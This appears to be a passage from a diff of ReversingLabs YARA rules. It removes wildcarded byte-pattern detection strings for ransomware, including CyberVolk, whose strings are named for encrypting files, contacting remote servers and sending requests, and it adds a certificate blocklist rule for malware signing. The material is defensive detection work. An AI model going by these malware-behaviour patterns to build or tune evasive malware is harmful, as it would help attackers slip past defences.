-            ?? ?? 83 C4 ?? 33 F6 33 C0 8D 8C 24 ?? ?? ?? ?? 8A 04 1E 8D 94 24 ?? ?? ?? ?? 50 51
-            68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ?? ?? ?? 7C ?? 8D 84 24 ?? ??
-            ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 33 F6 F2 AE F7 D1 49 51 8D 8C 24 ?? ??
-            ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ??
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 46 FF 15 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ??
-            33 C0 8D 94 24 ?? ?? ?? ?? F2 AE F7 D1 49 52 8D 84 24 ?? ?? ?? ?? 51 50 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? BE ?? ?? ?? ?? 8D 84 24 ?? ??
-            ?? ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ??
-            83 C0 ?? 83 C6 ?? 84 C9 75 ?? 33 C0 EB
-        }
-		$remote_server_2 = {
-            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 51 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 52 03 D8 E8 ?? ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? 8D BC 24 ?? ?? ?? ?? 83 C4
-            ?? C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 83 E1 ?? 68 ?? ?? ?? ?? F3 A4 8D 8C 24 ?? ??
-            ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? BB
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ??
-            ?? ?? ?? 03 D8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B CB 8B F0 8B
-            D1 BF ?? ?? ?? ?? C1 E9 ?? F3 A5 83 C4 ?? 8B CA 83 E1 ?? 8D 84 24 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? F3 A4 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            BB ?? ?? ?? ?? 2B D8 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 03 D8 E8 ??
-            ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? BF ?? ?? ?? ?? 68 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B
-            C8 68 ?? ?? ?? ?? 83 E1 ?? F3 A4 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ?? 33 C0
-            83 C4 ?? F2 AE F7 D1 49 83 F9 ?? 0F 82 ?? ?? ?? ?? 33 F6 8D BC 24 ?? ?? ?? ?? 8D 8C
-            34 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 46 83 C7 ?? 81 FE ?? ??
-            ?? ?? 72 ?? 8B 3D ?? ?? ?? ?? FF D7 8D 94 24 ?? ?? ?? ?? 56 52 8B E8 E8 ?? ?? ?? ??
-            83 C4 ?? FF D7 8B F0 8D 44 24 ?? 50 2B F5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            4C 24 ?? 8D 94 24 ?? ?? ?? ?? 51 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ??
-            8D 84 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 F2 AE F7 D1 49 51 8D 8C
-            24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-        }
-		$send_post_packet = {
-            68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83
-            FE ?? 89 75 ?? 75 ?? 50 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B
-            8B E5 5D C3 6A ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 66 89 45 ?? 52 E8 ?? ??
-            ?? ?? 89 45 ?? 8D 45 ?? 6A ?? 50 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ??
-            33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8D BD ?? ?? ?? ?? 83 C9 ??
-            33 C0 6A ?? F2 AE F7 D1 49 51 8D 8D ?? ?? ?? ?? 51 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
-            56 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$send_get_request = {
-            68 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83
-            FB ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33
-            C0 5B 81 C4 ?? ?? ?? ?? C3 6A ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 66
-            89 44 24 ?? 52 E8 ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 6A ?? 50 53 E8 ?? ?? ?? ?? 83
-            F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33
-            C0 5B 81 C4 ?? ?? ?? ?? C3 8B FD 83 C9 ?? 33 C0 6A ?? F2 AE F7 D1 49 51 55 53 E8 ??
-            ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
-            5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_server_1 and $remote_server_2 and $send_post_packet and $send_get_request
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gidrokon LLC" and pe.signatures [ i ] . serial == "76:0c:ef:38:6b:63:40:67:51:ae:83:a9:ea:e9:23:42" and 1601942400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cybervolk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5C2625Fa836A64F4882C56Cc7A45F0Ed : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CyberVolk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4d8bf096-d5c9-5a77-99e6-2c66e480da36"
-		date = "2024-11-27"
-		modified = "2024-11-27"
+		id = "db968865-fb1e-57b5-8968-6510e83c02ac"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.CyberVolk.yara#L1-L293"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "59ed7c4f576fa7cd4cceb724d14f258598c140e434ed309fe2e599c3aaa667d9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15444-L15460"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "85e187684d62c33ef6f69323b837ef2d44facab8278b512d7bd6afd49eaed976"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CyberVolk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$manage_gui_p1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 57 50
-            6A ?? 6A ?? 6A ?? 6A ?? FF D6 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? 83 F8 ?? 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? FF
-            D6 6A ?? 8B F8 FF D6 8B 75 ?? 99 2B C2 6A ?? D1 F8 68 ?? ?? ?? ?? 2D ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 8B C7 99 2B C2 D1 F8 2D ?? ?? ?? ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 6A
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5 5D C2 ?? ??
-            80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
-            F0 83 C4 ?? BF ?? ?? ?? ?? 85 F6 74 ?? 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 56 E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 4F 50 FF 75 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B F8 57
-            89 7C 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B 35 ?? ?? ?? ?? 50 89 44 24 ?? FF D6 89
-            44 24 ?? 8D 44 24 ?? 50 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? FF 74 24 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
-            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ??
-            ?? ?? ?? 50 57 FF D6 8B 74 24 ?? B8 ?? ?? ?? ?? F7 EE B8 ?? ?? ?? ?? 03 D6 C1 FA ??
-            8B FA C1 EF ?? 03 FA F7 EE 03 D6 C1 FA ?? 8B CA C1 E9 ?? 03 CA 8B D1 C1 E2 ?? 2B D1
-        }
-		$manage_gui_p2 = {
-            C1 E2 ?? 8B CE B8 ?? ?? ?? ?? 2B CA 51 69 CF ?? ?? ?? ?? 2B F1 F7 EE 03 D6 C1 FA ??
-            8B C2 C1 E8 ?? 03 C2 50 57 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 44 24 ?? 6A ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 ?? ?? ??
-            ?? FF 74 24 ?? 8B 74 24 ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50
-            FF 75 ?? FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
-            F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? 8D 84 24 ?? ?? ?? ?? 57 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 0F 1F 40 ?? 8A 01 41 84
-            C0 75 ?? 56 2B CA 8D 84 24 ?? ?? ?? ?? 51 6A ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 75
-            ?? FF D7 8B 35 ?? ?? ?? ?? 50 FF D6 8B 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 FF D7 50 FF D6
-            8B 75 ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 8D 44 24
-            ?? 50 56 FF 15 ?? ?? ?? ?? 50 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B 3D ?? ??
-            ?? ?? 50 89 44 24 ?? FF D7 8B F0 8D 44 24 ?? 50 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 6A ?? FF 74 24 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF
-            74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 74
-            24 ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 74 24 ?? FF D7 6A
-            ?? 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 56 8B 74 24
-        }
-		$manage_gui_p3 = {
-            56 FF D7 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 33 C0 5F
-            5E 8B E5 5D C2 ?? ?? 0F B7 45 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??
-            83 E8 ?? 0F 84 ?? ?? ?? ?? 2D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 7D ?? 6A ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 6A ?? 8D 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 50 0F 57 C0 C6 44 24 ?? ?? 68 ?? ?? ?? ?? 57 0F 29 44 24
-            ?? 0F 29 44 24 ?? FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA
-            83 F9 ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5
-            5D C2 ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 50
-            6A ?? 6A ?? 6A ?? 6A ?? FF D6 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 56 6A ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ??
-            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 6A ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 8B E5 5D C2 ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0
-            56 FF 15 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 00 0F 10 05 ?? ?? ?? ?? 0F 11 40 ??
-            F3 0F 7E 05 ?? ?? ?? ?? 66 0F D6 40 ?? 66 8B 0D ?? ?? ?? ?? 66 89 48 ?? 8A 0D ?? ??
-            ?? ?? 88 48 ?? EB ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ??
-            8B F0 56 FF 15 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 00 0F 10 05 ?? ?? ?? ?? 0F 11
-            40 ?? 66 8B 0D ?? ?? ?? ?? 66 89 48 ?? 8A 0D ?? ?? ?? ?? 88 48 ?? 56 FF 15 ?? ?? ??
-            ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 33 C0 5F 5E 8B E5 5D C2 ?? ?? 3D ?? ?? ?? ?? 75 ?? 81 7D
-        }
-		$find_files_v1_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 8B FA 8B D9 89 5D ?? 66 83 FF ?? 75
-            ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B CB 89 45 ?? 83 C4 ?? 66 A1 ?? ?? ?? ?? 66 89 45 ??
-            8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81 F9 ?? ?? ?? ?? 0F 87 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 0F B7 0B 0F B7 95 ?? ??
-            ?? ?? 8B D9 8B F2 8D 41 ?? 0F B7 C0 8D 4A ?? 89 45 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0
-            8B C6 8B 35 ?? ?? ?? ?? 0F 47 D0 66 83 7D ?? ?? 8D 43 ?? 0F B7 C8 8B C3 0F 47 C8 66
-            3B D1 0F 85 ?? ?? ?? ?? 66 83 7D ?? ?? 8D 43 ?? 0F B7 C8 8B C3 8B 5D ?? 0F 47 C8 0F
-            B7 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 66 89 0B 68 ?? ?? ?? ?? 50 FF
-            D6 8D 8D ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 0F 1F 80 ?? ?? ?? ?? 66 8B 01 83 C1 ?? 66 85
-            C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? D1 F9 51 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
-            8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? A8
-            ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 5D ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D6 83
-            C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 83
-            FE ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 0F 1F 80 ?? ?? ?? ?? 66 8B 01 83
-            C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81 F9 ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ??
-            ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66
-            3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F
-            84 ?? ?? ?? ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66
-        }
-		$find_files_v1_p2 = {
-            8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 53 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 53
-            66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 66 83
-            FF ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? EB ?? 66 83 FF ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 66 89 85 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 66 83 FF ?? 75 ?? 8D 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 33 F6 66 66 0F 1F 84 00
-            ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? 74 ?? 57 6A ?? 6A ?? 51 E8 ?? ??
-            ?? ?? 46 83 C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 57 E8 ?? ?? ?? ?? 8B 75 ?? 83 C4 ?? 56 FF
-            15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_v1_p1 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 51 53 81 EC ?? ?? ?? ?? 53 56 57 89 65
-            ?? 8B F9 89 7D ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 85 ?? ?? ?? ?? 0F 11 45 ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 0F 13 45 ?? 66 0F 13
-            45 ?? 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 57 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ??
-            8B F7 8D 4E ?? 0F 1F 00 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 83 C6 ?? 89 75
-            ?? C7 45 ?? ?? ?? ?? ?? 33 C9 8B C6 BA ?? ?? ?? ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 33 C9 66 89 08 57 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 8B 75 ?? 56 E8 ?? ??
-            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 56 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B CA
-            89 4D ?? 85 C9 0F 8C ?? ?? ?? ?? 7F ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8B F8 89 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? BA ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ??
-            6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 57 FF 75 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8B C8 89 4D ?? 99 8B F0 89 75 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 81
-        }
-		$encrypt_files_v1_p2 = {
-            F9 ?? ?? ?? ?? 7E ?? B9 ?? ?? ?? ?? 8B F7 8D BD ?? ?? ?? ?? F3 A5 8D 45 ?? 50 8D 45
-            ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? FF 75 ?? 8B 7D ?? 57 8B 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 85 ??
-            ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 75 ?? 56 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ??
-            83 C4 ?? EB ?? 51 57 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 45
-            ?? 50 8D 85 ?? ?? ?? ?? 50 56 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
-            75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 03 C6 89 45 ??
-            8B 4D ?? 13 4D ?? 89 4D ?? 3B 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 45 ?? 0F 82 ?? ?? ??
